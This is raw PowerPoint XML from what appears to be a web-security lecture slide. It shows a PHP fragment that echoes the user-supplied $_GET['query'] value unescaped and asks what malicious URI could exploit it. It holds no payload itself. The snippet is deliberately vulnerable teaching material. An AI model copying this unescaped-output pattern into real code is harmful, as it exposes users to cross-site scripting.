            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“Your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$_GET['query']</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>returned</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2599571" y="4174743"/>
            <a:ext cx="2731347" cy="332783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEFCF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2480"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$num</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>results."</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5330579" y="4174743"/>
            <a:ext cx="545253" cy="332783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2480"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415171" y="4540503"/>
            <a:ext cx="7642860" cy="711200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5732145" h="533400">
                <a:moveTo>
                  <a:pt x="3343656" y="274320"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2250948" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250948" y="533400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3343656" y="533400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3343656" y="274320"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5732145" h="533400">
                <a:moveTo>
                  <a:pt x="5731764" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1229868" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="259080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1229868" y="259080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5731764" y="259080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5731764" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278991" y="4472771"/>
            <a:ext cx="7615767" cy="1727054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3136822" marR="6773" indent="-3001358">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" i="1" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" i="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" i="1" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chocolate returned </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" i="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>81 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" i="1" spc="-1427" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" i="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>results.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" marR="519840" indent="-457189">
              <a:lnSpc>
                <a:spcPts val="2813"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1913"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is a possible malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URI </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-645" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this?</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3759200" cy="467360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2819400" h="350520">
                <a:moveTo>
                  <a:pt x="2819400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="350278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819400" y="350278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2819400" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104985" y="0"/>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12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759200" y="0"/>
            <a:ext cx="4572000" cy="467360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3429000" h="350520">
                <a:moveTo>
                  <a:pt x="3429000" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="350278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="350278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5EC422"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622712" y="0"/>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4" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8331200" y="0"/>
            <a:ext cx="3860800" cy="467360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2895600" h="350520">
                <a:moveTo>
                  <a:pt x="2895600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="350278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2895600" y="350278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2895600" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DADADA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11242377" y="0"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8355582" y="2528875"/>
            <a:ext cx="3428153" cy="2297852"/>
            <a:chOff x="6266686" y="1896656"/>
            <a:chExt cx="2571115" cy="1723389"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6310807" y="1908112"/>
              <a:ext cx="2495092" cy="1694154"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6302933" y="1901418"/>
              <a:ext cx="2505075" cy="1703705"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2505075" h="1703704">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2504630" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504630" y="1703679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1703679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6399149" y="2659303"/>
              <a:ext cx="1934210" cy="358140"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1934209" h="358139">
                  <a:moveTo>
                    <a:pt x="1842516" y="185928"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="185928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="358140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1842516" y="358140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1842516" y="185928"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1934209" h="358139">
                  <a:moveTo>
                    <a:pt x="1933956" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1011936" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011936" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933956" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933956" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDF8E3"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6406174" y="2315311"/>
              <a:ext cx="990482" cy="149567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6551514" y="2317879"/>
              <a:ext cx="298450" cy="145415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="20421" y="27571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="88963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40970" y="88963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20535" y="27571"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="221068" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="293179" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293839" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294436" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294957" y="558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295478" y="927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295922" y="1574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="9372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="11607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="13690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294957" y="22377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294436" y="22783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293839" y="22987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293179" y="22987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="22987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285254" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285915" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286537" y="58470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287096" y="58877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287655" y="59283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289318" y="64236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289509" y="65684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="67449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="69545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="71691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289509" y="73482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289318" y="74891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289140" y="76314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287096" y="80137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286537" y="80518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285915" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285254" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293624" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294297" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294906" y="121653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295465" y="122059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296024" y="122466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="130784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="132943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="135102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294297" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293624" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221068" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218617" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216547" y="143713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214871" y="142265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213194" y="140804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="138442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="135166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="9258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="5994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213194" y="3632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214871" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216547" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218617" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221068" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="115912" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183896" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184556" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185153" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185674" y="609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186194" y="1016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186664" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187071" y="2616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187477" y="3556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187782" y="4800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="6362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188150" y="7924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="9817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="12052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="14287"/>
                  </a:lnTo>
